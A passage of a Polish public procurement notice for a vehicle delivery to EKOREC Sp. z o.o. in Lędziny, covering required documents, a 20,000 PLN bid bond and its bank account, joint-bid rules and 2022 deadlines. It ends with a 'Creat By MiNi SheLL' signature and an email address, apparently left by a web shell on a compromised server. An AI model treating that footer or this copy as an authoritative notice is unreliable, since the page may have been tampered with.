wynikać rok produkcji pojazdu, urządzeń, opis musi odpowiadać wymaganiom Zamawiającego, wykaz musi być precyzyjny i zawierać parametry techniczne dostarczanego pojazdu wraz z urządzeniami. <br/>- Zamawiający dopuszcza uzupełnienie środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym - zgodnie z Załącznikiem nr 1 do SWZ. <br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1)	oświadczenia, o których mowa w Rozdziale VI pkt 1 – SWZ – załącznik nr 2. <br/>2)	zobowiązanie innego podmiotu, o którym mowa w Rozdziale V pkt II SWZ (jeżeli dotyczy); <br/>3)	dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy).<br/> 4) Szczegółowy opis oferowanego kompletnego pojazdu wraz ze zdjęciem poglądowym. <br/> 5) DOWÓD WPŁATY WADIUM. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości: <br/> 20.000,00 zł. – (dwadzieścia tysięcy złotych 00/100). <br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 <br/>oraz ust. 2.<br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>- pieniądzu;<br/>-gwarancjach bankowych;<br/>- gwarancjach ubezpieczeniowych;<br/>- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustaw} z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w w ING Banku Śląskim<br/>Nr: 64 1050 1399 1000 0090 3078 9045<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania<br/>rachunku Zamawiającego. <br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe<br/>wymagania:<br/>- musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w p.z.p., bez potwierdzania tych okoliczności; <br/>- z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej<br/>kwoty wadium; <br/>- powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>- termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert); <br/>- w treści poręczenia łub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania; <br/>- beneficjentem poręczenia lub gwarancji jest: EKOREC Sp. z o.o. w Lędzinach.<br/>- w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj, zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum); <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Pełnomocnictwo, o którym mowa w pkt 1 musi znajdować się w ofercie.<br/>3.	Oferta wspólna powinna być sporządzona zgodnie z SWZ. <br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VI pkt 1,4 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wskazuje spełnianie warunków udziału w postępowaniu. <br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowalne/usługi/dostawy wykonują poszczególny Wykonawcy. <br/>6.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa OpenNexus</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-09 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-07</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie dokumenty oraz zapytania należy składać poprzez Platformę Zakupową Open Nexus.

Creat By MiNi SheLL
Email: jattceo@gmail.com